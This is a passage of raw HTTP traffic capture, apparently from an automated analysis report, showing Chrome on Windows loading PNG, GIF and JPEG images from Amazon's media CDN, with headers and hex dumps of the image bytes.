                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC349INData Raw: 79 91 80 44 17 08 35 f3 d4 ed be 23 47 8e e8 53 b7 7b 31 cb a9 e0 86 23 bf 0a 04 86 9f 53 c0 14 33 fc 94 96 96 be c8 c6 64 9e 9f be ed 07 81 50 d3 d6 45 7d 02 75 77 65 65 65 3e 33 1c d1 e2 d1 09 6d 38 f2 a3 40 60 f8 79 0f 58 62 86 1f 72 de 59 c3 fb 88 69 ec 09 b3 d7 4a a2 bd 91 be d1 9c f7 d7 d6 d6 ee 67 86 23 1a c8 95 c2 3c e3 37 91 4c c7 bd 87 b5 e1 47 b9 c1 5e 35 d7 85 54 78 be 5b 82 9f 04 42 6d a7 35 d2 21 a5 8c 53 6d 6f 30 b3 0c 8d 4d 8a 60 a2 f1 8b 38 d2 70 cf 51 6d f8 21 4c e6 ca 32 b0 5b 22 90 b1 db 5e b3 f6 d0 db db 7b 88 9b 66 54 0b fa 48 20 bf 60 67 e5 d8 84 c5 ac 4d a9 d8 37 55 64 fb 51 20 d4 5e b7 86 df 44 a7 6b ad 72 52 1d 67 5b 4e 50 7b c9 07 e2 d8 c3 ef 99 30 b0 ea b6 c6 f6 fa 54 12 ed 57 81 50 2b b1 46 9e aa 54 9d 04 d3 dc 6a 03 53 c9 54
                                                                                                                                                                                                                                                                      Data Ascii: yD5#GS{1#S3dPE}uweee>3m8@`yXbrYiJg#<7LG^5Tx[Bm5!Smo0M`8pQm!L2["^{fTH `gM7UdQ ^DkrRg[NP{0TWP+FTjST


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      33192.168.2.549759151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC621OUTGET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 538
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: d5189db1-f8c3-4f78-829a-75d78c2ff8c1
                                                                                                                                                                                                                                                                      Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 11 May 2020 07:06:36 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Wed, 27 Sep 2023 11:31:22 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      Age: 19340
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000068-IAD, cache-ewr-kewr1740036-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC538INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 19 08 06 00 00 00 ea ac a4 f1 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e4 05 0b 07 06 05 7d 9f be c9 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 01 a7 49 44 41 54 38 cb 9d 92 b1 6e c2 30 14 45 d3 56 ed d6 09 c6 4a fd 88 fe 40 db 15 a9 1b 08 16 06 16 be 00 66 26 10 08 09 27 40 10 5b 99 32 30 32 f0 11 64 88 fa 13 24 2a 5b 3a 22 b9 f7 56 76 ea 98 80 aa 5a ba 7a b1 fd 4e ee b3 9f 1d c7 18 ad 56 eb 71 36 9b b9 be ef 87 50 ca b8 58 2c c4 72 b9 2c 3b 45 a3 d3 e9 bc b9 ae 9b 4c a7 53 89 c4 23 b4 63 04 c8 79 0c 3d e7 80 27 8c d1 68 f4 29 84 90 84 e0 e6 21 c9 01 e0 11 d2 60 ce b1 db ed be 03 92 93 c9 e4 07 42 52 84 84 0a 12 23 0d 29
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRpHYstIME}bKGDIDAT8n0EVJ@f&'@[202d$*[:"VvZzNVq6PX,r,;ELS#cy='h)!`BR#)


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      34192.168.2.549765151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1457OUTGET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 14535
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: a5410faa-300c-4c27-a76f-baa4c87405f7
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 10 Mar 2023 01:34:32 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Expires: Sun, 30 Aug 2043 07:57:14 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      Age: 1860536
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200141-IAD, cache-ewr-kewr1740043-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 47 49 46 38 39 61 32 00 32 00 f4 19 00 fd fe fe ad d0 d5 5d a8 b4 14 87 99 d7 e9 eb f4 f5 f5 3a 97 a6 ec ee ee dd e0 e0 f0 f3 f3 e5 e7 e7 9e c8 cf f9 fb fb e8 ea ea cb d7 d9 c8 e1 e4 8e c1 c9 e2 ef f1 f1 f7 f8 7b b6 c0 ef f0 f0 f6 f7 f7 bc d8 dd 03 7d 91 da de de d9 dd dd d7 db db e0 e3 e3 02 75 8b e5 e3 e2 ec e7 e5 ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a22]:{}u!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 68 89 d1 a2 22 97 d7 a6 21 a2 dd 7a a9 82 70 d8 52 ce 4c cf 5f 75 58 90 b5 bd e1 48 f9 bc 4e d3 e1 e3 7a 56 02 44 2a 7f 2f 2a 29 5c 60 81 17 6c 35 5c 86 29 8f 11 8b 72 04 34 77 5e 7c 8f 69 81 7c 09 78 2a 6d 19 16 81 10 66 70 15 a3 27 3e 96 24 a0 67 aa ab 27 7a 13 27 a9 b3 25 0f 7a 43 85 5e b9 5b 9d 6b 22 7e 48 0c c0 5b 72 06 6e 70 c8 26 95 4d 99 3b c7 ce af 96 be 49 9b c0 00 d7 67 d5 cf 6a 02 c5 87 df ba 6a 63 9a e5 d6 6a b1 ea b4 ec e9 ee 6e 96 f1 ee 04 f4 54 05 f2 a4 e7 2b bf f2 d0 80 60 33 e6 8e 1b bc 76 ea 22 74 ab f7 2d e0 8f 19 e3 c8 7d 93 a0 8c 18 ae 6a 06 5c 31 43 88 ec 9e 1c 28 07 2e e6 aa e0 b0 d1 ab 50 23 31 53 94 ac 43 01 65 9b 29 0b d4 04 30 d2 45 24 21 3f 19 ad 8c c1 14 49 12 26 48 49 72 32 49 60 c7 d0 a1 44 89 f0 2c 10 c0 94 c2 4d a3 50 a9
                                                                                                                                                                                                                                                                      Data Ascii: h"!zpRL_uXHNzVD*/*)\`l5\)r4w^|i|x*mfp'>$g'z'%zC^[k"~H[rnp&M;IgjjcjnT+`3v"t-}j\1C(.P#1SCe)0E$!?I&HIr2I`D,MP
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 02 6b d1 e4 37 01 d6 11 00 73 68 eb 37 e6 b8 88 6d db f3 9f cd 09 ea f3 36 ed 70 b5 6a f3 8f 1e 33 50 03 b1 8c 2b 38 e6 20 a5 3c b2 18 96 bb 85 b0 4f 13 2d 12 1b 0e b3 28 2e a3 46 5c 49 7a e5 23 07 cf a1 21 88 11 3d b2 32 f0 c6 cf 5f 46 00 fb 56 39 03 93 40 65 02 93 d7 e0 b9 2c 18 0c 67 2b 1a f8 24 a2 88 b9 0a 1b a0 91 62 24 2c c0 59 c9 d8 4e 6e 29 28 56 74 fa f4 17 3c 49 f6 8a 01 3d 86 d4 c6 55 a6 06 1e 28 e3 da f5 04 83 07 58 f9 8d 25 ab 89 4b 04 96 d6 06 10 f0 0a 48 dc 8c 1a 77 cf 06 64 6a 08 02 8e 15 75 d1 1c 48 e1 08 c1 52 be 0f f9 04 8e 87 01 6e dc 01 79 14 fb 61 92 f6 db 5c 29 d9 fc ec 8d 6b c9 ea e4 1f 8f 0f 69 f5 1c cb 8d 54 50 13 02 cc cb 5c e7 74 ea 19 ff 0a bb 11 f6 10 51 26 86 8f 18 07 b2 f3 80 b0 c7 11 8f fa bc 68 74 aa ac 88 10 00 21 f9 04
                                                                                                                                                                                                                                                                      Data Ascii: k7sh7m6pj3P+8 <O-(.F\Iz#!=2_FV9@e,g+$b$,YNn)(Vt<I=U(X%KHwdjuHRnya\)kiTP\tQ&ht!
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: e3 ec 3a 67 f9 27 f5 b2 dd f3 f7 af 83 05 7a ec 0c a4 c0 97 0e c0 c1 80 03 81 e5 03 00 21 60 bb 85 12 e3 55 c0 16 d0 c2 29 86 d5 08 20 e4 77 0c 19 38 06 0b f6 a7 ad d3 d2 2f 63 48 8b f6 58 06 3a 39 41 25 b9 07 38 56 99 b4 e5 10 e6 80 08 aa 66 f2 8a e0 73 82 a0 59 8d 5c 31 78 30 b2 9e 84 23 1f 1b d5 b2 e1 90 a3 c5 09 c2 0a 15 a1 22 c0 e6 ba 6e 8b 50 85 91 85 23 c7 35 9f e5 6a e4 e2 71 cd d9 04 0b 1e 09 c0 5d d0 d5 2b bb 00 53 83 5a a9 6b b7 2f 3b a3 5b 87 c5 99 87 b6 70 36 08 bb f2 e8 b4 6a 18 26 e0 34 82 7f f0 6d dc 51 29 d2 c9 94 c9 29 4c 6c 09 52 cd cc e4 04 78 3c 59 c1 02 66 c3 6f 39 07 eb 32 80 b1 57 03 88 0b 9e 40 01 57 c0 84 ae 13 16 e8 2e e6 2a 04 00 21 f9 04 09 03 00 1e 00 2c 00 00 00 00 32 00 32 00 00 05 ff a0 27 8e 64 e9 01 68 72 28 08 d6 36 ab
                                                                                                                                                                                                                                                                      Data Ascii: :g'z!`U) w8/cHX:9A%8VfsY\1x0#"nP#5jq]+SZk/;[p6j&4mQ))LlRx<Yfo92W@W.*!,22'dhr(6
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: f9 b2 e0 84 0a 81 20 f4 ac 08 d1 0b 0a 9a 43 0b e2 0c 14 c0 e6 cb 87 12 72 e2 98 e0 72 68 cc 2b 3c 93 1a f0 17 b5 8b 57 00 0f 9a 26 85 19 40 e7 83 b1 16 fb 61 24 10 01 63 c3 aa 63 8b ea 44 8a d6 69 56 bb 2f 7f 7e 04 5b b7 6f 52 b9 4f e8 fa 1d ec 8f 8c 85 c1 7e b7 e6 d4 95 12 71 cf 92 8b cd 36 76 cc 61 5f 04 7c 03 ef 12 be 5c 8d 40 43 bf 10 20 72 83 17 60 02 84 05 04 fb 6d 0d c0 76 74 91 10 00 21 f9 04 09 03 00 1f 00 2c 00 00 00 00 32 00 32 00 00 05 ff e0 27 8e 64 09 7c 00 a3 1e cd d6 b2 49 11 a7 65 6d df 64 1a bb 19 a6 f9 c0 5f 8f 22 c3 19 6f 3a de 30 c8 6c 16 8e d0 a4 b0 49 ad 32 a0 36 e9 b2 ca 65 c6 b0 39 46 77 dc 3d 81 c5 88 2d 79 9d 36 1b b5 6c 35 d9 8d 2c c8 e3 71 ba 69 c7 26 56 e0 77 41 14 38 7c 65 7f 27 6e 88 7f 0a 53 56 59 6b 15 28 47 80 54 7a 28
                                                                                                                                                                                                                                                                      Data Ascii: Crrh+<W&@a$ccDiV/~[oRO~q6va_|\@C r`mvt!,22'd|Iemd_"o:0lI26e9Fw=-y6l5,qi&VwA8|e'nSVYk(GTz(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 2b 11 14 64 b6 19 e8 b6 0e 1a 94 1b 01 90 8a 15 a0 35 c0 82 00 13 f8 c6 e4 a0 ce ee 0f ae 37 80 ae 95 17 76 f0 3c 01 a9 64 d8 59 d0 78 b1 e3 a4 d1 86 e6 aa 6c 19 6b dd 70 6a 22 e8 ed 9c d1 c2 e1 65 0f f2 5e 26 cd 61 26 82 4d d3 1e 4c 58 6d d9 f5 d0 3e 0c 2c cc 1e bd f6 9b d4 9a 93 e4 96 34 07 61 42 c1 df 22 31 01 2e ee d7 6f 84 86 3b 61 85 00 00 21 f9 04 09 03 00 1f 00 2c 00 00 00 00 32 00 32 00 00 05 ff e0 27 8e 64 29 02 55 aa ac 58 c3 26 05 c3 98 74 6d 9f 2e 9b b5 7c bf fd a8 9b d0 a4 f2 19 8f 40 c0 50 28 43 20 9f c7 d9 92 d8 84 5a 8d ca 29 ee 77 ed f6 b2 4b 94 66 e7 2d 37 82 4c 8a 99 6c 96 da c4 eb b8 02 4c 6d a3 62 07 18 f7 4a 27 31 d8 4f 30 68 27 1f 77 6a 80 51 7d 85 7b 81 83 35 86 63 81 44 88 58 5a 85 7f 94 5f 7e 8c 95 96 5b 99 3c 9b 8d 9e 23 70 4f
                                                                                                                                                                                                                                                                      Data Ascii: +d57v<dYxlkpj"e^&a&MLXm>,4aB"1.o;a!,22'd)UX&tm.|@P(C Z)wKf-7LlLmbJ'1O0h'wjQ}{5cDXZ_~[<#pO
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff a0 27 8e 64 e9 01 68 52 a9 5b 73 28 b0 cb 98 74 6d 8b a8 d8 6a 19 e6 f7 26 15 e0 46 2c a5 62 bd 9f 72 f9 2b 14 9f 3a 44 92 49 a5 42 6d 9b eb 73 a8 45 05 1c bc aa 58 cc e0 6e 2d 86 f4 04 3c 6e 33 af 90 01 67 7e 31 b0 dd f8 43 11 10 bf f8 ff 02 79 53 6d 66 41 04 74 7f 7f 77 3f 38 2b 8e 3b 84 85 24 11 72 89 89 5f 18 2a 38 93 47 61 63 35 09 13 88 96 03 01 2f 92 34 9d 62 35 7d a4 7e 81 39 50 5e 6d 9c 95 ae 1c 04 a8 57 83 4b 33 38 16 a3 96 0f 5a 86 bc 4d 5c 11 a2 b7 0b ba 57 b3 55 23 0b b6 96 10 12 c4 a0 64 27 02 b7 b8 cd c4 0c 08 36 b1 a0 d7 a0 14 19 36 01 b7 76 e5 37 c6 3e 15 ca a4 13 d6 ed d8 54 f1 cb be f6 50 40 34 dd fc 82 14 78 b7 61 9b ab 61 01 69 78 5a 22 4f 58 c2 7e 0d 1a 26 22 f0 d0 08 a4 25 06 6e 55 b4 08 ed 9f a9 8d 27 2a a0 a3 a1 0e a4 b8 04 0b
                                                                                                                                                                                                                                                                      Data Ascii: 'dhR[s(tmj&F,br+:DIBmsEXn-<n3g~1CySmfAtw?8+;$r_*8Gac5/4b5}~9P^mWK38ZM\WU#d'66v7>TP@4xaaixZ"OX~&"%nU'*
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 34 03 70 48 25 3a 94 19 d9 91 d1 7c 3e 1f 8b 81 b0 5a 35 6a cf d9 99 17 3a 11 90 df 97 09 7a be e4 ae 77 53 38 d9 4c 47 17 ee 28 79 7a 55 57 7d 74 36 4e 11 82 83 43 72 69 8f 86 7f 89 6e 8c 63 1c 13 7c 58 86 32 05 88 26 61 95 6d 11 16 12 5c a6 0d 07 30 90 87 39 11 62 83 06 0f a5 27 36 b5 a7 9b 9c 37 0c 8b 55 b1 04 28 4f 00 c2 31 ab 67 4c 25 10 96 64 02 04 12 80 22 4c c5 c6 24 0c af 6f cc 5d cf c3 9b d9 00 c9 70 b1 9e da 5c 49 7d 5d d5 7a b2 cf ba e4 e6 22 0f ca 54 02 e2 eb d0 34 91 1e 94 6f 11 f5 ad aa 87 e8 de 4c a0 d7 0f 45 01 69 08 84 c5 1b c2 af 20 94 7f 74 16 06 21 e8 10 85 a1 6f cb 2a fa eb c3 2b 48 00 8d ec 0c 75 e4 f0 00 a4 2e 84 23 7f b9 99 a4 86 70 02 9c 92 2b 77 b4 7c 19 53 66 9f 00 70 e6 d5 b4 78 33 a7 b3 9a a9 0c 81 83 b9 12 80 26 63 12 2f 58
                                                                                                                                                                                                                                                                      Data Ascii: 4pH%:|>Z5j:zwS8LG(yzUW}t6NCrinc|X2&am\09b'67U(O1gL%d"L$o]p\I}]z"T4oLEi t!o*+Hu.#p+w|Sfpx3&c/X
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 96 63 78 30 aa ca 47 6b 4b 86 7a c1 25 86 e5 57 6e bf 04 18 0a 15 7d 75 ba cb dd f8 3c 59 59 d8 ef 64 70 08 19 72 7b 38 00 13 7f 6d 6c 5a 13 83 71 72 48 7e 6e 02 0b 0f 46 2a 34 63 4f 79 71 9e 86 24 6b 78 10 98 47 23 3c 58 2f 9d 9e 84 09 87 9b 8d 46 56 11 2b 96 1d ac ac a0 6a 8a 40 16 68 22 28 05 b7 b8 b8 69 8c 50 11 bf 24 3c 84 c4 7a a7 a2 5a b2 ca cb ce b9 c0 c7 51 a0 d4 27 d6 cf 27 5b 13 36 dc 69 0d de 0c 54 b0 4f 0f e4 87 1b e7 0c 3e 59 0b 5f ed e5 1a d6 7d d9 2f 67 f6 f7 d6 93 a0 c0 f1 67 02 5d 33 67 8a e8 11 fc e7 2c 40 c2 85 0c 11 66 f1 05 f1 94 1a 6f f2 82 18 70 55 11 9a b7 00 19 5f 28 ec 08 ec d1 47 01 28 f1 9f a1 23 d9 ed 9c c9 47 15 b6 11 4c 70 d0 1b 31 99 f6 98 39 3b 70 8e 24 03 05 35 73 bd bc 56 51 e7 4e a0 f9 8a f2 cc 67 14 57 05 a5 49 9b 3a
                                                                                                                                                                                                                                                                      Data Ascii: cx0GkKz%Wn}u<YYdpr{8mlZqrH~nF*4cOyq$kxG#<X/FV+j@h"(iP$<zZQ''[6iTO>Y_}/gg]3g,@fopU_(G(#GLp19;p$5sVQNgWI:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 10 8d 68 27 22 9a 61 02 73 50 5d 37 80 0e 92 66 11 28 77 62 a0 42 06 9b 6a 18 9f 5a 01 09 70 28 0f a6 a7 b0 08 16 40 a1 af 70 80 6c 86 9c 07 18 c7 08 10 89 06 16 7e b6 23 09 be b3 9b a4 c8 bc 2d 7d ce cf 23 bd 5b ae 28 15 bc d6 1d 19 e4 c0 db 9c 10 de 14 e0 e5 e3 c7 36 e8 26 a0 13 19 29 1b ee ef e7 f2 22 79 59 53 1d ee bd 2b 57 61 1f bf 0a 2e 5a 01 c4 90 20 dc c0 0d da f8 41 bb 56 4f 83 b5 04 f9 c6 19 3c 48 01 9f 07 71 0f 35 4a fc 92 31 a4 c8 91 26 4c a3 3e 8c 88 f2 96 4a 7d 2d 53 be 3c 19 b3 d8 cc 8b 35 27 ae 2c 89 6c a3 3c 81 37 7b e6 ac a6 8f 28 4d 94 40 8b 9a ac 99 54 a4 02 9e f0 5a 36 75 6a d2 67 b0 8e 2b 4f 4c c5 c9 11 24 4c 9b 2b bb 42 8d 0a 36 eb b6 ad 5c 75 86 2c 90 e2 aa c7 90 a3 1a bc 8c 77 67 2e c9 b1 17 35 41 03 e7 d0 eb c3 4a 41 d9 d6 18 fc
                                                                                                                                                                                                                                                                      Data Ascii: h'"asP]7f(wbBjZp(@pl~#-}#[(6&)"yYS+Wa.Z AVO<Hq5J1&L>J}-S<5',l<7{(M@TZ6ujg+OL$L+B6\u,wg.5AJA


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      35192.168.2.549764151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC644OUTGET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 39516
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 0fd27b01-5385-4286-ac07-7fe05b79c898
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 11 Jan 2022 14:48:33 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 100332
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100053-IAD, cache-ewr-kewr1740048-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 ff db 00 43 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c0 00 11 08 00 fa 01 2c 03 00 11 00 01 11 01 02 11 01 ff c4 00 1f 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 0a 03 04 0b 02 01 ff c4 00 54 10 00 00 05 03 03 03 02 04 03 05 03 05 0a 0c 07 00 01 02 03 04 05 00 06 07 08 11 12 09 13 21 14 31 0a 22 41 51 15 32 61 16
                                                                                                                                                                                                                                                                      Data Ascii: JFIFCC,T!1"AQ2a
